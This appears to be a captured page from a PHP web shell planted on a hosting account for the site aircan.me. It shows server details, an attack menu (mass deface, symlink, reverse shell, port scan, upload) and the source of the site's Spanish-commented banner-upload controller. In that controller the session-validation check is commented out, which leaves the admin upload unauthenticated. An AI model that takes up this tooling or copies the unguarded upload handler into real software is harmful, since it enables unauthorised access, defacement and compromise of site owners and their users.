Tul xxx Tul
User / IP
:
216.73.216.146
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
grolik
/
admin
/
controlador
/
Viewing: actualizar_banner.php
<?php session_start();//inicia variables de sesion // require "valida_sesion.php";//valida que la sesión del usuario esté iniciada require "xxx.php";//conecta con la base de datos principal date_default_timezone_set("America/Mexico_City");//establece zona horaria para un registro correcto de fecha y hora //extrae los datos del banner anterior $sql="SELECT banner FROM datos_empresa"; $exe["banner"]=mysqli_query($xxx,$sql); $row["banner"]=mysqli_fetch_row($exe["banner"]); $bannerAnterior = ''; if($row["banner"] && isset($row["banner"][0])){ $bannerAnterior = trim($row["banner"][0]); } //establece directorio de almacenamiento de imagenes $dir = "../img/"; // Recoger la ruta de la imagen seleccionada por el usuario $imagenTmp = isset($_FILES['banner']['tmp_name']) ? $_FILES['banner']['tmp_name'] : ''; if(empty($imagenTmp) || !is_uploaded_file($imagenTmp)){ $_SESSION["e"]="No se recibió ninguna imagen"; mysqli_close($xxx); unset($sql,$exe,$row,$_POST,$_FILES); header("Location: ../index.php"); exit; } // Obtener el tipo de imagen $tipo_imagen = @exif_imagetype($imagenTmp); $tempName = 'tmp_banner_'.date('ymd-His_').uniqid().($tipo_imagen == IMAGETYPE_PNG ? '.png' : '.jpg'); $tempPath = $dir.$tempName; if(!move_uploaded_file($imagenTmp, $tempPath)){ $_SESSION["e"]="No se pudo guardar la imagen temporal"; mysqli_close($xxx); unset($sql,$exe,$row,$_POST,$_FILES); header("Location: ../index.php"); exit; } $newFileName = ''; $resource = false; // función auxiliar para borrar anterior $eliminarAnterior = function($ruta) use ($dir){ if(!empty($ruta)){ $full = $dir.$ruta; if(is_file($full)){ @unlink($full); } } }; if ($tipo_imagen == IMAGETYPE_JPEG) { $resource = @imagecreatefromjpeg($tempPath); // Establecer calidad de compresión (entre 0 y 100, donde 100 es sin compresión) $compression_quality = 25; //nuevo nombre $newFileName="banner_".date("ymd-His_").".jpg"; // Crear ruta de la imagen comprimida $compressed_image_path = $dir.$newFileName; // Guardar imagen comprimida if($resource){ imagejpeg($resource, $compressed_image_path, $compression_quality); } // Liberar memoria if($resource){ imagedestroy($resource); } @unlink($tempPath); $eliminarAnterior($bannerAnterior); } elseif ($tipo_imagen == IMAGETYPE_PNG) { $newFileName="banner_".date("ymd-His_").".png"; $compressed_image_path = $dir.$newFileName; // Cargar la imagen original $resource = @imagecreatefrompng($tempPath); if($resource){ imagealphablending($resource, true); imagesavealpha($resource, true); } // Establecer la calidad de compresión (valor entre 0 y 9) $calidad = 3; // Guardar la imagen comprimida en un archivo PNG if($resource){ imagepng($resource, $compressed_image_path, $calidad); } // Liberar la memoria ocupada por la imagen if($resource){ imagedestroy($resource); } @unlink($tempPath); $eliminarAnterior($bannerAnterior); } else { // No es una imagen JPG ni PNG $_SESSION["e"]="Elegiste un archivo que no es una imagen"; mysqli_close($xxx); unset($sql,$exe,$row,$_POST,$_FILES); header("Location: ../index.php"); exit; } if(empty($newFileName) || !is_file($dir.$newFileName)){ // algo salió mal; intenta limpiar temp y salir @unlink($tempPath); $_SESSION["e"]="No se pudo procesar la imagen"; mysqli_close($xxx); unset($sql,$exe,$row,$_POST,$_FILES); header("Location: ../index.php"); exit; } //guarda la información en la base de datos $sql="UPDATE datos_empresa SET banner='{$newFileName}'"; $exe["upd"]=mysqli_query($xxx,$sql); //valida si la consulta salió bien if($exe["upd"]==TRUE){ //wiiiiiiii todo salió bien ALV $_SESSION["e"]="Se actualizó el banner de su Empresa"; }else{ //wiiiiiiii todo salió bien ALV $_SESSION["e"]="No se pudo actualizar el banner de la Empresa - Error:".mysqli_errno($xxx); } mysqli_close($xxx); unset($sql,$exe,$row,$_POST,$_FILES); header("Location: ../index.php");
Coded With 💗 by
0x6ick